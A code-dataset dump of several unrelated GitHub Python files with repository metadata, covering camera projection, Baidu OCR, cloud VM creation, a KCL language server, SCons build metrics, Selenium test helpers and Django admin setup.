output_matrix = np.dot(m1,camera_matrix)
u_array = (output_matrix[0]/output_matrix[2])/width
v_array= (output_matrix[1]/output_matrix[2])/height
u = u_array[0].astype(float)
v = v_array[0].astype(float)
return u,v
def _plot_sample(joint_dict, img):
joints = np.zeros(((len(joint_dict) -1) // 2, 2))
for ei, joint in enumerate(list(joint_dict.values())[1:]):
joints[ei // 2, ei % 2] = joint
plt.imshow(img)
joints *= img.shape[:2][::-1]
plt.scatter(joints[:, 0], joints[:, 1], s=10, c='r')
plt.show()
# plt.savefig('test.png')
list_of_results = []
camera_params, transform = _parse_camera_parameter('shuttleFront')
img = cv2.imread(file_path, cv2.IMREAD_COLOR)
width = img.shape[1]
height = img.shape[0]
with open(path) as f:
''' read the csv file and convert the 3D Position to 2D Position and save it in a new csv file'''
rows = [{k: v for k, v in row.items()} for row in csv.DictReader(f, skipinitialspace=True)]
for row in rows:
mDict = {}
mDict['timestamp'] = row['timestamp']
for x_header in row.keys():
if '.x' in x_header:
y_header = x_header.replace('.x','.y')
z_header = x_header.replace('.x','.z')
x_value = row[x_header]
y_value = row[y_header]
z_value = row[z_header]
u,v= convert_3d_to_2d_position(x_value,y_value,z_value, transform, camera_params, width, height)
mDict[x_header] = u
mDict[y_header] = v
list_of_results.append(mDict)
_plot_sample(mDict, img)
with open(output_kineckt, 'w', encoding='UTF8', newline='') as f2:
writer = csv.DictWriter(f2, mDict.keys())
writer.writeheader()
writer.writerows(list_of_results)
| elma1294/Neuroinformatic | Mediapipe/3Dto2D.py | 3Dto2D.py | py | 5,279 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "xml.etree.ElementTre... |
35845929436 | from aip import AipOcr
import configparser
class BaiDuAPI:
'''调用百度云的API来实现数字的识别
filePath:
--------
是工单信息的ini配置文件全路径
'''
def __init__(self, filePath):
target = configparser.ConfigParser() # 初始化ConfigParser类
# r'D:\我的坚果云\Python\Python课件\24点\password.ini'
target.read(filePath) # 读取ini文件
# 读取工单信息
# target.get第一个参数是section,第二个是键名,返回对应值
app_id = target.get('工单密码', 'APP_ID')
api_key = target.get('工单密码', 'API_KEY')
secret_key = target.get('工单密码', 'SECRET_KEY')
""" 你的 APPID AK SK """
APP_ID = app_id
API_KEY = api_key
SECRET_KEY = secret_key
self.client = AipOcr(APP_ID, API_KEY, SECRET_KEY)
def picture2Text(self, filePath):
image = self.get_file_content(filePath)
""" 调用通用文字识别, 图片参数为本地图片 """
texts = self.client.basicGeneral(image)
allTexts = ''
for words in texts['words_result']:
allTexts = allTexts + ''.join(words.get('words',''))
return allTexts
# """ 读取图片 """
# @staticmethod
# def get_file_content(filePath):
# with open(filePath, 'rb') as fp:
# return fp.read()
@classmethod
def get_file_content(cls, filePath):
with open(filePath, 'rb') as fp:
return fp.read()
if __name__ == '__main__':
baiduapi = BaiDuAPI(
r'D:\Windows 7 Documents\Documents\PythonCode\24\password.ini')
allTexts = baiduapi.picture2Text(
r'D:\Windows 7 Documents\Documents\PythonCode\24\Snipaste_2018-05-19_22-42-33.png')
print(allTexts)
| web-yuzm/ScreenShot | baidu.py | baidu.py | py | 1,875 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "aip.AipOcr",
"line_number": 27,
"usage_type": "call"
}
] |
12424365843 | from wordcloud import WordCloud
from PIL import Image
def make_ngram_wordcloud(count, target, filename):
wordcloud = WordCloud(
font_path = '../d2coding.ttf',
width = 800,
height = 800,
background_color = "white"
)
gen = wordcloud.generate_from_frequencies(count)
array = gen.to_array()
save_as_image(array, target, filename)
def save_as_image(data, target, filename):
im = Image.fromarray(data)
im.save("./" + target + "/" + filename + ".jpg") | ghyeon0/BigData_Homework | HW4/HW4_renew/draw_wordcloud.py | draw_wordcloud.py | py | 502 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "wordcloud.WordCloud",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "wordcloud.generate_from_frequencies",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "PIL.Image.fromarray",
"line_number": 16,
"usage_type": "call"
},
{
"api_na... |
21533047473 | import sys, math
from collections import defaultdict
def countPerms(nxt):
prev = nxt.pop(0)
i = 0
print("r")
ans = 1
while True:
if i >= len(nxt):
return 1
if nxt[i] <= prev + 3:
ans += 1
i += 1
return ans * countPerms(nxt)
with open(sys.argv[1]) as fil:
adapters = sorted([0]+[int(i.strip()) for i in fil.readlines()])
adapters.append(max(adapters) + 3)
voltages = defaultdict(int)
print(adapters)
for i in range(len(adapters) - 1):
voltages[adapters[i+1]-adapters[i]] += 1
print(voltages)
print("Part 1:", voltages[3] * voltages[1])
print(countPerms(adapters.copy())) | micahjmartin/AdventOfCode2020 | 10/jolts.py | jolts.py | py | 658 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "collections.defaultdict",
"line_number": 23,
"usage_type": "call"
}
] |
8617391664 | from collections.abc import Iterable
from .vars import ColorPalette
import numpy as np
from powerlaw import plot_ccdf
def aaai_init_plot(plt, profile='1x2'):
rc = {'axes.titlesize': 18, 'axes.labelsize': 16, 'legend.fontsize': 16,
'font.size': 16, 'xtick.labelsize': 16, 'ytick.labelsize': 16}
plt.rcParams.update(rc)
if profile == '1x1':
fig, ax = plt.subplots(1, 1, figsize=(10, 4.2))
return ax
elif profile == '1x2':
fig, axes = plt.subplots(1, 2, figsize=(10, 3.3))
axes = axes.ravel()
return axes
elif profile == '1x3':
fig, axes = plt.subplots(1, 3, figsize=(10, 3.3))
axes = axes.ravel()
return axes
elif profile == '2x2':
fig, axes = plt.subplots(2, 2, figsize=(10, 6.6))
axes = axes.ravel()
return axes
def concise_fmt(x, pos):
if abs(x) // 1000000000 > 0:
return '{0:.0f}B'.format(x / 1000000000)
elif abs(x) // 1000000 > 0:
return '{0:.0f}M'.format(x / 1000000)
elif abs(x) // 1000 > 0:
return '{0:.0f}K'.format(x / 1000)
elif x == 10:
return '10'
elif x == 1:
return '1'
else:
return '{0:.0f}'.format(x)
def exponent_fmt(x, pos):
if x == 0:
return '0'
elif x == 1:
return '1'
elif x == 10:
return '10'
else:
return '$10^{{{0}}}$'.format(int(np.log10(x)))
def exponent_fmt2(x, pos):
if x == 0:
return '1'
elif x == 1:
return '10'
else:
return '$10^{{{0}}}$'.format(int(x))
def exponent_fmt3(x, pos):
if x < 0:
return '0'
elif x == 0:
return '1'
elif x == 1:
return '10'
else:
return '$10^{{{0}}}$'.format(int(x))
def hide_spines(axes):
if isinstance(axes, Iterable):
for ax in axes:
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
else:
axes.spines['right'].set_visible(False)
axes.spines['top'].set_visible(False)
def gini(arr):
count = arr.size
coefficient = 2 / count
indexes = np.arange(1, count + 1)
weighted_sum = (indexes * arr).sum()
total = arr.sum()
constant = (count + 1) / count
return coefficient * weighted_sum / total - constant
def lorenz(arr):
# this divides the prefix sum by the total sum
# this ensures all the values are between 0 and 1.0
scaled_prefix_sum = arr.cumsum() / arr.sum()
# this prepends the 0 value (because 0% of all people have 0% of all wealth)
return np.insert(scaled_prefix_sum, 0, 0)
def plot_dist_lorenz(axes, num_comment_list, color, ls, label, annotated=False):
plot_ccdf(num_comment_list, ax=axes[0], color=color, ls=ls, label=label)
sorted_comment_list = np.sort(np.array(num_comment_list))
lorenz_curve = lorenz(sorted_comment_list)
gini_coef = gini(sorted_comment_list)
print('>>> In {0} videos, Gini coefficient is {1:.4f}'.format(label, gini_coef))
axes[1].plot(np.linspace(0.0, 1.0, lorenz_curve.size), lorenz_curve, color=color, ls=ls, label=label)
if annotated:
pinned_idx = next(x for x, val in enumerate(lorenz_curve) if val > 0.25)
pinned_x = np.linspace(0.0, 1.0, lorenz_curve.size)[pinned_idx]
pinned_y = 0.25
axes[1].scatter([pinned_x], [pinned_y], c='r', s=30, marker='o', fc='r', ec='r', zorder=30)
axes[1].text(pinned_x, pinned_y, '({0:.2f}%, {1:.0f}%)'.format(100 - 100 * pinned_x, 100 - pinned_y * 100),
size=14, horizontalalignment='right', verticalalignment='bottom')
| avalanchesiqi/youtube-crosstalk | utils/plot_conf.py | plot_conf.py | py | 3,608 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "numpy.log10",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "collections.abc.Iterable",
"line_number": 75,
"usage_type": "argument"
},
{
"api_name": "numpy.arange",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "numpy.insert",
... |
31986796192 | import json
import configparser
from tcecloud.common import credential
from tcecloud.common.profile.client_profile import ClientProfile
from tcecloud.common.profile.http_profile import HttpProfile
from tcecloud.common.exception.tce_cloud_sdk_exception import TceCloudSDKException
from tcecloud.cvm.v20170312 import cvm_client, models
class TceCvmCreate(object):
def __init__(self, SecretId, SecretKey):
self.SecretId = SecretId
self.SecretKey = SecretKey
def create_cvm(self, params):
try:
cred = credential.Credential(self.SecretId, self.SecretKey)
httpProfile = HttpProfile()
httpProfile.endpoint = "cvm.api3.tce.com"
clientProfile = ClientProfile()
clientProfile.httpProfile = httpProfile
client = cvm_client.CvmClient(cred, "chongqing", clientProfile)
req = models.RunInstancesRequest()
req.from_json_string(json.dumps(params))
resp = client.RunInstances(req)
print(resp.to_json_string())
except TceCloudSDKException as err:
print(err)
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read("setting.ini", encoding="utf-8")
cvm = TceCvmCreate(config.get("defaults", "SecretId"), config.get("defaults", "SecretKey"))
params = {
"InstanceChargeType": "POSTPAID_BY_HOUR",
"Placement": {
"Zone": "cqaz1"
},
"InstanceType": "S3.MEDIUM4",
"ImageId": "img-cphll0yv",
"SystemDisk": {
"DiskType": "CLOUD_SSD",
"DiskSize": 50
},
"DataDisks": [
{
"DiskType": "CLOUD_SSD",
"DiskSize": 100,
"DeleteWithInstance": True
}
],
"VirtualPrivateCloud": {
"VpcId": "vpc-gynsaui3",
"SubnetId": "subnet-8r1n8f1s",
"AsVpcGateway": False,
},
"InstanceCount": 1,
"InstanceName": "test-liuzhx",
"LoginSettings": {
"Password": "Root123456789"
},
"SecurityGroupIds": ["sg-az6hnjl8"],
"EnhancedService": {
"SecurityService": {
"Enabled": True
},
"MonitorService": {
"Enabled": True
}
},
"HostName": "liuzhx",
"DryRun": False
}
cvm.create_cvm(params)
| zcsee/pythonPra | pra/create.py | create.py | py | 2,448 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tcecloud.common.credential.Credential",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "tcecloud.common.credential",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "tcecloud.common.profile.http_profile.HttpProfile",
"line_number": 18,
"u... |
1938506265 | from typing import List, cast, Optional
from pygls.lsp.types.basic_structures import Location
import kclvm.kcl.ast as ast
import kclvm.kcl.types.scope as scope
import kclvm.tools.langserver.common as common
from kclvm.api.object.object import KCLTypeKind, KCLModuleTypeObject
from kclvm.api.object.schema import KCLSchemaTypeObject, KCLSchemaDefTypeObject
def definition(
pos: ast.Position, code: str = None
) -> (Optional[ast.AST], Optional[scope.ScopeObject]):
prog: ast.Program
prog, leaf_node = common.pos_to_node(pos, code)
if not leaf_node:
# no name node at the position
return None, None
parent: ast.AST = leaf_node.parent
if isinstance(leaf_node, ast.Name):
if (
parent.type == "Identifier"
and parent.parent.type == "ConfigEntry"
and parent is parent.parent.key
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
schema_expr: ast.SchemaExpr = leaf_node.find_nearest_parent_by_type(
ast.SchemaExpr
)
if schema_expr:
schema_name: ast.Identifier = schema_expr.name
schema_scope_obj = find_declaration(
schema_name, schema_name.name_nodes[-1], prog_scope
)
top_attr = find_inner_name(
schema_scope_obj, identifier.name_nodes[0], prog_scope
)
result_obj = find_declaration_by_scope_obj(
identifier=identifier,
name_node=leaf_node,
top_name_obj=top_attr,
prog_scope=prog_scope,
)
return leaf_node, result_obj
if parent.type == "Identifier" and (
parent.parent.type != "ConfigEntry" or parent is parent.parent.value
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
declaration = find_declaration(identifier, leaf_node, prog_scope)
return leaf_node, declaration
return leaf_node, None
def go_to_def(pos: ast.Position, code: str = None) -> List[Location]:
prog: ast.Program
prog, leaf_node = common.pos_to_node(pos, code)
if not leaf_node:
# no name node at the position
return []
parent: ast.AST = leaf_node.parent
if isinstance(leaf_node, ast.Name):
if parent.type == "ImportStmt":
import_stmt: ast.ImportStmt = cast(ast.ImportStmt, parent)
if leaf_node in import_stmt.path_nodes:
index = import_stmt.path_nodes.index(leaf_node)
if index == len(import_stmt.path_nodes) - 1:
# this might be a module name, return the target module file path
loc = common.pkgpath_to_location(
root=prog.root, pkgpath=import_stmt.path
)
return [loc] if loc else []
return [common.node_to_location(leaf_node)]
if (
parent.type == "Identifier"
and parent.parent.type == "ConfigEntry"
and parent is parent.parent.key
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
schema_expr: ast.SchemaExpr = leaf_node.find_nearest_parent_by_type(
ast.SchemaExpr
)
if schema_expr:
schema_name: ast.Identifier = schema_expr.name
schema_scope_obj = find_declaration(
schema_name, schema_name.name_nodes[-1], prog_scope
)
top_attr = find_inner_name(
schema_scope_obj, identifier.name_nodes[0], prog_scope
)
result_obj = find_declaration_by_scope_obj(
identifier=identifier,
name_node=leaf_node,
top_name_obj=top_attr,
prog_scope=prog_scope,
)
loc = common.scope_obj_to_location(result_obj)
return [loc] if loc else []
if parent.type == "Identifier" and (
parent.parent.type != "ConfigEntry" or parent is parent.parent.value
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
declaration = find_declaration(identifier, leaf_node, prog_scope)
loc = common.scope_obj_to_location(declaration)
return [loc] if loc else []
return [common.node_to_location(leaf_node)]
def find_declaration(
identifier: ast.Identifier, name_node: ast.Name, prog_scope: scope.ProgramScope
) -> Optional[scope.ScopeObject]:
if not identifier or not name_node or not prog_scope:
return None
top_name = identifier.name_nodes[0]
top_name_obj = find_declaration_obj_by_pos_and_name(
top_name.pos, top_name.value, prog_scope
)
return find_declaration_by_scope_obj(
identifier, name_node, top_name_obj, prog_scope
)
def find_declaration_by_scope_obj(
identifier: ast.Identifier,
name_node: ast.Name,
top_name_obj: scope.ScopeObject,
prog_scope: scope.ProgramScope,
) -> Optional[scope.ScopeObject]:
if not identifier or not name_node or not top_name_obj or not prog_scope:
return None
index = identifier.name_nodes.index(name_node)
i = 0
obj = top_name_obj
while i < index:
i = i + 1
obj = find_inner_name(obj, identifier.name_nodes[i], prog_scope)
if not obj:
return None
return obj
def find_declaration_obj_by_pos_and_name(
pos: ast.Position, name: str, prog_scope: scope.ProgramScope
) -> Optional[scope.ScopeObject]:
if not pos or not pos.is_valid() or not name or not prog_scope:
return None
inner_most = prog_scope.main_scope.inner_most(pos)
if not inner_most or not inner_most.elems:
return None
scope_obj = inner_most.elems.get(name)
if scope_obj is not None:
return scope_obj
# 1. search through the parent schema scope tree
parent_scope = inner_most.get_parent_schema_scope(prog_scope)
while parent_scope is not None:
scope_obj = parent_scope.elems.get(name)
if scope_obj is not None:
return scope_obj
parent_scope = parent_scope.get_parent_schema_scope(prog_scope)
# 2. search through the enclosing scope tree
while inner_most is not None:
scope_obj = inner_most.elems.get(name)
if scope_obj is not None:
return scope_obj
inner_most = inner_most.get_enclosing_scope()
return None
def find_inner_name(
out_name_obj: scope.ScopeObject,
inner_name: ast.Name,
prog_scope: scope.ProgramScope,
) -> Optional[scope.ScopeObject]:
if not out_name_obj or not inner_name or not prog_scope:
return None
if out_name_obj.type.type_kind() == KCLTypeKind.SchemaKind:
return find_attr_by_name(inner_name.value, out_name_obj.type, prog_scope)
if out_name_obj.type.type_kind() == KCLTypeKind.ModuleKind:
out_type = cast(KCLModuleTypeObject, out_name_obj.type)
if out_type.is_user_module:
pkg_scope = prog_scope.scope_map.get(out_type.pkgpath)
return pkg_scope.elems.get(inner_name.value) if pkg_scope else None
if out_name_obj.type.type_kind() == KCLTypeKind.SchemaDefKind:
out_type = cast(KCLSchemaDefTypeObject, out_name_obj.type)
return find_attr_by_name(inner_name.value, out_type.schema_type, prog_scope)
def find_attr_by_name(
attr_name: str, schema_type: KCLSchemaTypeObject, prog_scope: scope.ProgramScope
) -> Optional[scope.ScopeObject]:
while schema_type:
if attr_name in schema_type.attr_list:
# todo: support jump to schema index signature
pkg_scope = prog_scope.scope_map.get(schema_type.pkgpath)
schema_scope = pkg_scope.search_child_scope_by_name(schema_type.name)
return schema_scope.elems.get(attr_name) if schema_scope else None
schema_type = schema_type.base
return None
| kcl-lang/kcl-py | kclvm/tools/langserver/go_to_def.py | go_to_def.py | py | 8,329 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "kclvm.kcl.ast.Position",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "kclvm.kcl.ast",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "kclvm.kcl.ast.Program",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "... |
36840454719 | """SCons metrics."""
import re
import os
from typing import Optional, NamedTuple, List, Pattern, AnyStr
from buildscripts.util.cedar_report import CedarMetric, CedarTestReport
SCONS_METRICS_REGEX = re.compile(r"scons: done building targets\.((\n.*)*)", re.MULTILINE)
MEMORY_BEFORE_READING_SCONSCRIPT_FILES_REGEX = re.compile(
r"Memory before reading SConscript files:(.+)")
MEMORY_AFTER_READING_SCONSCRIPT_FILES_REGEX = re.compile(
r"Memory after reading SConscript files:(.+)")
MEMORY_BEFORE_BUILDING_TARGETS_REGEX = re.compile(r"Memory before building targets:(.+)")
MEMORY_AFTER_BUILDING_TARGETS_REGEX = re.compile(r"Memory after building targets:(.+)")
OBJECT_COUNTS_REGEX = re.compile(r"Object counts:(\n.*)+Class\n(^[^:]+$)", re.MULTILINE)
TOTAL_BUILD_TIME_REGEX = re.compile(r"Total build time:(.+)seconds")
TOTAL_SCONSCRIPT_FILE_EXECUTION_TIME_REGEX = re.compile(
r"Total SConscript file execution time:(.+)seconds")
TOTAL_SCONS_EXECUTION_TIME_REGEX = re.compile(r"Total SCons execution time:(.+)seconds")
TOTAL_COMMAND_EXECUTION_TIME_REGEX = re.compile(r"Total command execution time:(.+)seconds")
CACHE_HIT_RATIO_REGEX = re.compile(r"(?s)\.*hit rate: (\d+\.\d+)%(?!.*hit rate: (\d+\.\d+)%)")
DEFAULT_CEDAR_METRIC_TYPE = "THROUGHPUT"
class ObjectCountsMetric(NamedTuple):
"""Class representing Object counts metric."""
class_: Optional[str]
pre_read: Optional[int]
post_read: Optional[int]
pre_build: Optional[int]
post_build: Optional[int]
def as_cedar_report(self) -> CedarTestReport:
"""Return cedar report representation."""
metrics = [
CedarMetric(
name="pre-read object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.pre_read,
),
CedarMetric(
name="post-read object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.post_read,
),
CedarMetric(
name="pre-build object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.pre_build,
),
CedarMetric(
name="post-build object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.post_build,
),
]
return CedarTestReport(
test_name=f"{self.class_} class",
thread_level=1,
metrics=metrics,
)
class SconsMetrics:
"""Class representing SCons metrics."""
memory_before_reading_sconscript_files: Optional[int] = None
memory_after_reading_sconscript_files: Optional[int] = None
memory_before_building_targets: Optional[int] = None
memory_after_building_targets: Optional[int] = None
object_counts: List[ObjectCountsMetric] = None
total_build_time: Optional[float] = None
total_sconscript_file_execution_time: Optional[float] = None
total_scons_execution_time: Optional[float] = None
total_command_execution_time: Optional[float] = None
final_cache_hit_ratio: Optional[float] = None
def __init__(self, stdout_log_file, cache_debug_log_file):
"""Init."""
with open(stdout_log_file, "r") as fh:
res = SCONS_METRICS_REGEX.search(fh.read())
self.raw_report = res.group(1).strip() if res else ""
if self.raw_report:
self.memory_before_reading_sconscript_files = self._parse_int(
MEMORY_BEFORE_READING_SCONSCRIPT_FILES_REGEX, self.raw_report)
self.memory_after_reading_sconscript_files = self._parse_int(
MEMORY_AFTER_READING_SCONSCRIPT_FILES_REGEX, self.raw_report)
self.memory_before_building_targets = self._parse_int(
MEMORY_BEFORE_BUILDING_TARGETS_REGEX, self.raw_report)
self.memory_after_building_targets = self._parse_int(
MEMORY_AFTER_BUILDING_TARGETS_REGEX, self.raw_report)
self.object_counts = self._parse_object_counts(OBJECT_COUNTS_REGEX, self.raw_report)
self.total_build_time = self._parse_float(TOTAL_BUILD_TIME_REGEX, self.raw_report)
self.total_sconscript_file_execution_time = self._parse_float(
TOTAL_SCONSCRIPT_FILE_EXECUTION_TIME_REGEX, self.raw_report)
self.total_scons_execution_time = self._parse_float(TOTAL_SCONS_EXECUTION_TIME_REGEX,
self.raw_report)
self.total_command_execution_time = self._parse_float(
TOTAL_COMMAND_EXECUTION_TIME_REGEX, self.raw_report)
if os.path.exists(cache_debug_log_file):
try:
with open(cache_debug_log_file, "r") as fh:
self.final_cache_hit_ratio = self._parse_float(CACHE_HIT_RATIO_REGEX, fh.read())
except Exception: # pylint: disable=broad-except
self.final_cache_hit_ratio = 0.0
else:
self.final_cache_hit_ratio = 0.0
def make_cedar_report(self) -> List[dict]:
"""Format the data to look like a cedar report json."""
cedar_report = []
if not self.raw_report:
return cedar_report
if self.memory_before_reading_sconscript_files:
cedar_report.append(
CedarTestReport(
test_name="Memory before reading SConscript files",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_before_reading_sconscript_files,
)
],
).as_dict())
if self.memory_after_reading_sconscript_files:
cedar_report.append(
CedarTestReport(
test_name="Memory after reading SConscript files",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_after_reading_sconscript_files,
)
],
).as_dict())
if self.memory_before_building_targets:
cedar_report.append(
CedarTestReport(
test_name="Memory before building targets",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_before_building_targets,
)
],
).as_dict())
if self.memory_after_building_targets:
cedar_report.append(
CedarTestReport(
test_name="Memory after building targets",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_after_building_targets,
)
],
).as_dict())
if self.total_build_time:
cedar_report.append(
CedarTestReport(
test_name="Total build time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_build_time,
)
],
).as_dict())
if self.total_sconscript_file_execution_time:
cedar_report.append(
CedarTestReport(
test_name="Total SConscript file execution time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_sconscript_file_execution_time,
)
],
).as_dict())
if self.total_scons_execution_time:
cedar_report.append(
CedarTestReport(
test_name="Total SCons execution time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_scons_execution_time,
)
],
).as_dict())
if self.total_command_execution_time:
cedar_report.append(
CedarTestReport(
test_name="Total command execution time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_command_execution_time,
)
],
).as_dict())
if self.object_counts:
for obj_counts in self.object_counts:
cedar_report.append(obj_counts.as_cedar_report().as_dict())
if self.final_cache_hit_ratio:
cedar_report.append(
CedarTestReport(
test_name="Final cache hit ratio",
thread_level=1,
metrics=[
CedarMetric(
name="percent",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.final_cache_hit_ratio,
),
],
).as_dict())
return cedar_report
@classmethod
def _parse_int(cls, regex: Pattern[AnyStr], raw_str: str) -> Optional[int]:
"""Parse int value."""
res = regex.search(raw_str)
if res:
return int(res.group(1).strip())
return None
@classmethod
def _parse_float(cls, regex: Pattern[AnyStr], raw_str: str) -> Optional[float]:
"""Parse float value."""
res = regex.search(raw_str)
if res:
return float(res.group(1).strip())
return None
@classmethod
def _parse_object_counts(cls, regex: Pattern[AnyStr], raw_str: str) -> List[ObjectCountsMetric]:
"""Parse object counts metrics."""
object_counts = []
res = regex.search(raw_str)
if res:
object_counts_raw = res.group(2)
for line in object_counts_raw.splitlines():
line_split = line.split()
if len(line_split) == 5:
object_counts.append(
ObjectCountsMetric(
class_=line_split[4],
pre_read=int(line_split[0]),
post_read=int(line_split[1]),
pre_build=int(line_split[2]),
post_build=int(line_split[3]),
))
return object_counts
| mongodb/mongo | buildscripts/scons_metrics/metrics.py | metrics.py | py | 11,535 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "re.compile",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "re.MULTILINE",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "re.compile",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number":... |
427635491 | # Base Mechanism
import selenium
import requests as req
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait as WDW
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options as ChromeOptions
from selenium.webdriver.edge.options import Options as EdgeOptions
from selenium.webdriver.common.action_chains import ActionChains
from src.locators.locators_index import HomePageLocators
# Databases
from src.db import db_gets_it as db_get
# Additionals
import string
import random
from time import sleep
# testing methods
import pytest
from selenium.common import exceptions as sel_except
url = 'https://qa.trado.co.il/'
def setup_driver(modal=False):
driver = ""
url = 'https://qa.trado.co.il/'
if conf.get_browser == 'chrome':
options = ChromeOptions()
options.add_argument("--disable-extensions")
# options.add_argument("--headless")
driver = webdriver.Chrome(options=options, executable_path="src/webdrivers/chromedriver.exe")
elif conf.get_browser == 'edge':
options = EdgeOptions()
options.add_argument("--disable-extensions")
# options.add_argument("--headless")
driver = webdriver.Edge(options=options, executable_path="src/webdrivers/msedgedriver.exe")
else:
options = ChromeOptions()
options.add_argument("--disable-extensions")
# options.add_argument("--headless")
driver = webdriver.Chrome(options=options, executable_path="src/webdrivers/chromedriver.exe")
driver.maximize_window()
driver.get(url)
if modal:
close_popup(driver)
else:
remove_annoying_popup(driver)
return driver
def remove_annoying_popup(driver):
WDW(driver, 5).until(EC.visibility_of_element_located(HomePageLocators.homeloc['popup_modal']))
driver.execute_script("""
var l = document.getElementsByClassName("modal_modalWrapper")[0];
l.parentNode.removeChild(l);
""")
def close_popup(driver):
try:
WDW(driver, 5).until(EC.visibility_of_element_located(HomePageLocators.homeloc['close_pop_up'])).click()
except sel_except.TimeoutException:
return
def click_somewhere_in_the_page(driver):
driver.find_element(By.XPATH, '//html').click()
def rand_string(group=string.digits, n=10):
"""
this function is taking a group of letters and then takes a number.
it returns a string with random chars from the group in the length of the number we provided
:param group:
:param n:
:return:
"""
return ''.join(random.choice(group) for i in range(n))
def filter_numbers(srt):
"""
string in, numbers out
filter text out, save only digits
:param srt:
:return:
"""
flt = "".join([flt for flt in srt if flt.isdigit()])
return int(flt)
| VSciFlight/IITC_trado_final_project | src/utils.py | utils.py | py | 2,925 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 38,
"usage_type": "name"
},
{... |
72623883625 | from django.contrib import admin
from .models import Category, Article, Like, Favorite, Comment
from import_export import resources
from import_export.admin import ImportExportModelAdmin
from django.utils.translation import gettext_lazy as _
class CategoryResource(resources.ModelResource):
class Meta:
model = Category
@admin.register(Category)
class CategoryAdmin(ImportExportModelAdmin, admin.ModelAdmin):
fieldsets = (
(_('Information'), {'fields': ('title', 'slug')}),
(_('Content'), {'fields': ('image', 'content')}),
)
list_display = ('title', 'slug')
list_display_links = ('title',)
list_editable = ('slug',)
prepopulated_fields = {"slug": ("title",)}
resource_class = CategoryResource
class Meta:
model = Category
@admin.register(Article)
class ArticleAdmin(admin.ModelAdmin):
fieldsets = (
(_('Information'), {'fields': ('user', 'title', 'slug', 'category', 'article_id')}),
(_('Content'), {'fields': ('image', 'content')}),
(_('Likes'), {'fields': ('liked',)}),
(_('Status'), {'fields': ('status',)})
)
list_display = ('title', 'slug', 'category', 'created_date', 'status', 'user')
list_display_links = ('title',)
list_editable = ('category', 'status')
list_filter = ('category', 'status')
search_fields = ('title', 'category', 'user')
class Meta:
model = Article
admin.site.register(Comment)
admin.site.register(Like)
admin.site.register(Favorite)
| FurkanKockesen/avukatimv2 | backEnd/blog/admin.py | admin.py | py | 1,510 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "import_export.resources.ModelResource",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "import_export.resources",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "models.Category",
"line_number": 10,
"usage_type": "name"
},
{
"... |
5146118763 | import os
import openpyxl
import shutil
import pandas as pd
import regex as re
dict1 = {}
dict2 = {}
def student():
df = pd.read_csv('studentinfo.csv')
for i in range(len(df)):
rolln = df.loc[i, "Roll No."]
email = df.loc[i, "email"]
